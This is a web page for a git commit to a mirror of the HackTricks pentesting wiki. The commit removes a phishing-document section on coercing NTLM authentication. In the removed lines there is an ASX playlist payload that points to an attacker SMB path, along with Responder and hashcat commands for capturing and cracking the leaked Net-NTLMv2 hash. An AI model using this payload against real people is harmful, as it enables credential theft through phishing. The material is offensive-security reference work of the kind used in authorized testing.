maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update phishing-documents.md

Browse Source
This commit is contained in:
SirBroccoli 2025-09-07 23:21:49 +02:00 committed by GitHub
parent cb51b0dcf8
commit 9a95bc80a3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 1 additions and 33 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
View File

@ -160,38 +160,6 @@ There are several ways to **force NTLM authentication "remotely"**, for example,
../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md
{{#endref}}
### Windows Media Player playlists (.ASX/.WAX) to coerce NTLM
If a workflow automatically previews media (e.g., HR reviewing uploads) using Windows Media Player, you can leak Net-NTLMv2 by providing a playlist that references a UNC path. When WMP loads the entry, it attempts SMB access with implicit NTLM authentication.
Example ASX payload (also supported by .WAX):
```xml
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://10.10.14.148\test\pwn.mp3" />
</entry>
</asx>
```
Collect and crack the hash:
```bash
# Capture Net-NTLMv2
sudo Responder -I <iface>
# Or run via uv if you manage dependencies with it
# sudo uv run --script Responder.py -I <iface>
# Crack (hashcat auto-detects NetNTLMv2, mode 5600)
hashcat ntlm.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
```
Notes
- Use ntlm_theft to generate ready-made WMP coercion files: https://github.com/Greenwolf/ntlm_theft
- If NTLM signing/SMB egress is blocked or NTLM disabled, this wont work. Otherwise, its effective when targets auto-open or preview uploaded playlists.
### NTLM Relay
Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**: